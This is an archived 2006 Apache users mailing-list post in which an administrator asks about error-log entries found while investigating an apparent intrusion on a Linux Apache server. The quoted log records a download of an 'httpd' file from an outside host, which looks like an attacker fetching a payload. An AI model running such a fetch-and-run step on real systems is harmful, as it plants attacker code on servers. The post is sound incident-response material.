Hi folks,

I sent this last night but didn't see it come through and I realize that I
did not mention that this occurred on a linux server running apache

Thanks for any advice or suggestions.


James R. Hay jrhay@HayA.QC.CA
Hay-Net Networks
P.O. Box 46051
Pointe Claire, QC
H9R 5R4

---------- Forwarded message ----------
Date: Sat, 28 Jan 2006 01:38:50 -0500 (EST)
From: James R. Hay <jrhay@HayA.QC.CA>
To: users@httpd.apache.org
Subject: Origin of error log entries?

The entries below were found in the Apache error log while investigating on
apparent exploit. Thus far I have not found any corresponding access log entry
and I am wondering if this is an indication that the intruder gained a shell?

httpd(315): Operation not permitted
sh: line 1: fetch: command not found
--00:44:12-- http://members.lycos.co.uk/img00d/httpd
=> `httpd'
Resolving members.lycos.co.uk... done.
Connecting to members.lycos.co.uk[]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,662 [text/plain]

0K .......... .......... ........ 100% 68.00 KB/s

00:44:13 (68.00 KB/s) - `httpd' saved [29662/29662]

php.cgi: no process killed

This begs the question of what is the source of entries for the error log? THe
virtual domains have their own logs and there should be no entries for any
websites in the main access or error logs.

Any suggestions would be appreciated.


James R. Hay jrhay@HayA.QC.CA
Hay-Net Networks
P.O. Box 46051
Pointe Claire, QC
H9R 5R4

The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Search Discussions

Discussion Posts

Follow ups

Related Discussions

Discussion Navigation
viewthread | post
posts ‹ prev | 1 of 4 | next ›
Discussion Overview
groupusers @
postedJan 28, '06 at 8:58p
activeJan 28, '06 at 10:13p

2 users in discussion

James R. Hay: 2 posts Joshua Slive: 2 posts



site design / logo © 2022 Grokbase